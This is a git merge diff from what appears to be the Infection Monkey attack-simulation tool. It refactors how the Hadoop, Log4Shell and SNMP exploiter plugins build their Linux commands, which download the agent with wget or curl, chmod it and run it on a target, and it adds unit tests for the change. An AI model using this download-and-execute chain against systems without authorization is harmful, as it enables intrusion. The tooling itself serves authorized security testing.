Merge branch '4187-use_permission_change_command' into develop

Issue #4187
PR #4192

monkey/agent_plugins/exploiters/hadoop/src/hadoop_command_builder.py

@@ -8,6 +8,7 @@
     LinuxDownloadMethod,
     LinuxDownloadOptions,
     LinuxRunOptions,
+    LinuxSetPermissionsOptions,
     TargetHost,
     WindowsDownloadMethod,
     WindowsDownloadOptions,
@@ -78,11 +79,17 @@ def _build_linux_hadoop_command(
         download_url=agent_download_url,
     )
 
+    chmod_options = LinuxSetPermissionsOptions(
+        agent_destination_path=agent_destination_path, permissions=0o700
+    )
+
     run_options = LinuxRunOptions(
         agent_destination_path=agent_destination_path,
         dropper_execution_mode=DropperExecutionMode.NONE,
     )
 
     agent_command_builder.build_download_command(download_options)
+    agent_command_builder.build_set_permissions_command(chmod_options)
     agent_command_builder.build_run_command(run_options)
+
     return agent_command_builder.get_command()

monkey/agent_plugins/exploiters/log4shell/src/log4shell_command_builder.py

@@ -8,6 +8,7 @@
     LinuxDownloadMethod,
     LinuxDownloadOptions,
     LinuxRunOptions,
+    LinuxSetPermissionsOptions,
     TargetHost,
     WindowsDownloadMethod,
     WindowsDownloadOptions,
@@ -77,11 +78,17 @@ def _build_linux_log4shell_command(
         download_url=agent_download_url,
     )
 
+    permission_options = LinuxSetPermissionsOptions(
+        agent_destination_path=agent_destination_path, permissions=0o700
+    )
+
     run_options = LinuxRunOptions(
         agent_destination_path=agent_destination_path,
         dropper_execution_mode=DropperExecutionMode.DROPPER,
     )
 
     agent_command_builder.build_download_command(download_options)
+    agent_command_builder.build_set_permissions_command(permission_options)
     agent_command_builder.build_run_command(run_options)
+
     return agent_command_builder.get_command()

monkey/agent_plugins/exploiters/snmp/src/snmp_command_builder.py

@@ -3,6 +3,7 @@
     ILinuxAgentCommandBuilder,
     LinuxDownloadMethod,
     LinuxDownloadOptions,
+    LinuxSetPermissionsOptions,
     LinuxRunOptions,
     TargetHost,
 )
@@ -20,11 +21,16 @@ def build_snmp_command(
         download_url=agent_download_url,
         agent_destination_path=dropper_script_dst_path,
     )
+    permission_options = LinuxSetPermissionsOptions(
+        agent_destination_path=dropper_script_dst_path,
+        permissions=0o700,
+    )
     run_options = LinuxRunOptions(
         dropper_execution_mode=DropperExecutionMode.SCRIPT,
         agent_destination_path=dropper_script_dst_path,
     )
     agent_command_builder.build_download_command(download_options)
+    agent_command_builder.build_set_permissions_command(permission_options)
     agent_command_builder.build_run_command(run_options)
 
     return f'-c "{agent_command_builder.get_command()}"'

monkey/infection_monkey/command_builders/linux_agent_command_builder.py

@@ -8,6 +8,7 @@
     LinuxDownloadMethod,
     LinuxDownloadOptions,
     LinuxRunOptions,
+    LinuxSetPermissionsOptions,
 )
 from monkeytypes import AgentID
 
@@ -42,21 +43,18 @@ def build_download_command(self, download_options: LinuxDownloadOptions):
     def _build_download_command_wget(
         self, download_url: str, destination_path: PurePosixPath
     ) -> str:
-        return (
-            f"wget -qO {destination_path} {download_url}; "
-            f"{self._set_permissions_command(destination_path)}; "
-        )
+        return f"wget -qO {destination_path} {download_url}; "
 
     def _build_download_command_curl(
         self, download_url: str, destination_path: PurePosixPath
     ) -> str:
-        return (
-            f"curl -so {destination_path} {download_url}; "
-            f"{self._set_permissions_command(destination_path)}; "
-        )
+        return f"curl -so {destination_path} {download_url}; "
 
-    def _set_permissions_command(self, destination_path: PurePosixPath) -> str:
-        return f"chmod +x {destination_path}"
+    def build_set_permissions_command(self, set_permissions_options: LinuxSetPermissionsOptions):
+        self._command += (
+            f"chmod {set_permissions_options.permissions:o} "
+            f"{set_permissions_options.agent_destination_path}; "
+        )
 
     def build_run_command(self, run_options: LinuxRunOptions):
         self._command += (

monkey/tests/unit_tests/infection_monkey/command_builders/test_linux_agent_command_builder.py

@@ -8,6 +8,7 @@
     LinuxDownloadMethod,
     LinuxDownloadOptions,
     LinuxRunOptions,
+    LinuxSetPermissionsOptions,
 )
 from monkeytypes import AgentID
 
@@ -55,10 +56,32 @@ def test_build_download_command(
 
     assert expected_method in actual_command
     assert not_expected_method not in actual_command
-    assert "chmod" in actual_command
     assert EXPECTED_AGENT_DESTINATION_PATH in actual_command
 
 
+@pytest.mark.parametrize(
+    "permissions, expected_command",
+    [
+        (0o777, f"chmod 777 {AGENT_DESTINATION_PATH}; "),
+        (0o700, f"chmod 700 {AGENT_DESTINATION_PATH}; "),
+        (0o550, f"chmod 550 {AGENT_DESTINATION_PATH}; "),
+    ],
+)
+def test_build_set_permissions_command(
+    linux_agent_command_builder: ILinuxAgentCommandBuilder,
+    permissions: int,
+    expected_command: str,
+):
+    linux_set_permissions_options = LinuxSetPermissionsOptions(
+        agent_destination_path=AGENT_DESTINATION_PATH, permissions=permissions
+    )
+
+    linux_agent_command_builder.build_set_permissions_command(linux_set_permissions_options)
+    actual_command = linux_agent_command_builder.get_command()
+
+    assert actual_command == expected_command
+
+
 def test_build_run_command_none(
     linux_agent_command_builder: ILinuxAgentCommandBuilder,
     agent_otp_environment_variable: str,

vulture_allowlist.py

@@ -182,3 +182,4 @@
 
 # TODO: Remove after we move the plugins to separate repos
 execute_agent
+LinuxAgentCommandBuilder.build_permission_change_command